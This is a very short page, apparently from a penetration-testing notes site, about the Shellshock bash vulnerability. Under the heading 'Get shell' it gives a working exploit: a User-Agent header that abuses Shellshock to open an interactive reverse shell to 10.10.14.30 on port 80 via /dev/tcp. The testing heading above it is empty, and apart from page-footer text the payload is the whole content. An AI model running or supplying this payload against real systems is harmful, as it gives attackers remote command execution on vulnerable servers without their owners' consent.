Shellshock

Testing if Vulnerable to shellshock:

Get shell:

User-Agent: () { :; }; echo; echo; /bin/sh -i >& /dev/tcp/10.10.14.30/80 0>&1 

Last updated

Was this helpful?